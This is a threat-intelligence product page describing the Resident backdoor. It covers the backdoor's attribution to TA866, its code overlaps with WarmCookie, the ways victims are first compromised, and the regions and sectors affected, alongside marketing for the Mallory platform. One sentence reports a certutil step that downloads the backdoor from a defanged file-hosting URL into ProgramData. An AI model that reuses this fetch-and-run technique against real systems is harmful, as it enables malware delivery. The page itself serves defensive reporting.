Resident
Resident is a backdoor malware family associated with TA866 (also known as Asylum Ambuscade). Cisco Talos reporting describes it as a backdoor used in limited post-compromise cases to download and execute additional payloads on victim systems. TA866 activity linked to Resident has been observed following initial access via malspam and malvertising, including campaigns using email thread hijacking, malicious hyperlinks, attached PDF or Microsoft Publisher files, malicious Google ads, SEO poisoning, and 404 TDS infrastructure. In one observed case, TA866 used certutil to retrieve the Resident backdoor from hxxps://temp[.]sh/esuJB/resident[.]exe and save it as C:\programdata\res.exe. Talos also noted that TA866 frequently used file-hosting services such as temp[.]sh for payload delivery.
Resident is linked by Cisco Talos to the same threat actor assessed to have developed WarmCookie/BadSpace. Reported overlaps between Resident and WarmCookie include identical RC4 decryption implementations, similar mutex management using GUID-like mutex strings, and similar persistence mechanisms, indicating likely shared authorship associated with TA866.
Resident has been observed in intrusion activity affecting victims primarily in the United States, with additional cases in Canada, the United Kingdom, Germany, Italy, Austria, and the Netherlands. The most affected sector reported for TA866 follow-on payload cases was manufacturing, followed by government and financial services.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
As described in prior reporting, Resident is a backdoor that can be used to download and execute additional payloads on victim systems.
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A backdoor malware family that shares notable code/function-level similarities with WarmCookie (e.g., RC4 implementation, mutex management, persistence mechanisms), suggesting shared development lineage.
Resident is a backdoor malware family noted here for code and functional similarities with WarmCookie, including RC4 implementation, mutex handling, startup logic, and persistence via scheduled tasks.
Resident is a persistent backdoor associated with TA866 intrusions that enables download and execution of additional payloads on victim systems.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.